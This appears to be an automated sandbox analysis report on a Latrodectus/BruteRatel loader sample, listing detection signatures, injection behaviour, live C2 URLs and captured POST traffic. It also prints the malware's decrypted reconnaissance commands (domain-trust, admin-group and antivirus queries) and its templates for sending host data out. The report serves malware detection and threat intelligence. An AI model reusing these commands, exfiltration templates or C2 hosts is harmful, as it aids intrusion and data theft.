Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name:	upfilles.dll.dll (renamed file extension from exe to dll)
Original sample name:	upfilles.dll.exe
Analysis ID:	1439879
MD5:	ccb6d3cb020f56758622911ddd2f1fcb
SHA1:	4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256:	f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags:	exe
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Bazar Loader

Yara detected BruteRatel

Yara detected Latrodectus

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel is a a Customized Command and Control Center for Red Team and Adversary SimulationSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.Built-in debugger to detect EDR userland hooks.Ability to keep memory artifacts hidden from EDRs and AV.Direct Windows SYS calls on the fly.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.spookysec.net/analyzing-brc4-badgers/ https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 https://github.com/VenzoV/MalwareAnalysisReports/blob/main/Latrodectus/Latrodectus%20%22Littlehw%22.md https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Signatures

AV Detection

Found malware configuration

Source: 22.0.explorer.exe.13a0000.0.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}

Multi AV Scanner detection for submitted file

Source: upfilles.dll.dll

ReversingLabs: Detection: 15%

Sample uses string decryption to hide its real strings

Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c ipconfig /all
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c systeminfo
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c nltest /domain_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net view /all /domain
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net view /all
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &ipconfig=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net config workstation
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c whoami /groups
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &systeminfo=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain_trusts=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain_trusts_all=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_view_all_domain=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_view_all=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_group=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &wmic=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_config_ws=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_wmic_av=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &whoami_group=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &proclist=[
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &desklinks=[
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s"
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Update_%x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Custom_update
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: runnung
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /files/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Electrol
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .+`lgSRHYJPpU\IETT05?=CAI
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: POST
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: GET
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: curl/7.88.1
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: p:
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: URLS
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: COMMAND
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ERROR
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: sZp
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: @-
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: <html>
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: <!DOCTYPE
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %s%d.dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: 12345
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &stiller=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %s%d.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: LogonTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %x%x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: TimeTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: PT0H%02dM
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &mac=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %02x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: :%02x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: PT0S
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &computername=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: \*.dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: https://workspacin.cloud/live/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: https://illoskanawer.com/live/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: AppData
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Desktop
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Startup
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Personal
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Local AppData
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: \update_data.dat

Source: unknown	HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2

Source:

Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8 FindFirstFileExW,	6_2_00000001800192B8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,	22_2_013A8BA8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	22_2_013A1A08
Source: C:\Windows\explorer.exe	Code function: 22_2_013ADCE0 FindFirstFileW,	22_2_013ADCE0

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 138.124.183.215 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 3.69.236.35 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 91.194.11.183 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 54.175.181.104 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 95.164.68.73 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.155 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://workspacin.cloud/live/
Source: Malware configuration extractor	URLs: https://illoskanawer.com/live/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NASSIST-ASGI NASSIST-ASGI
Source: Joe Sandbox View	ASN Name: NOKIA-ASFI NOKIA-ASFI
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: HQservCommunicationSolutionsIL HQservCommunicationSolutionsIL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 656Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 444Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.ioContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 248Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 180Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 22_2_013A4004 InternetReadFile,

22_2_013A4004

Source: global traffic	DNS traffic detected: DNS query: boriz400.com
Source: global traffic	DNS traffic detected: DNS query: altynbe.com
Source: global traffic	DNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
Source: global traffic	DNS traffic detected: DNS query: anikvan.com
Source: global traffic	DNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
Source: global traffic	DNS traffic detected: DNS query: workspacin.cloud

Source: unknown

HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:29 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:54 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:21 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains

Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
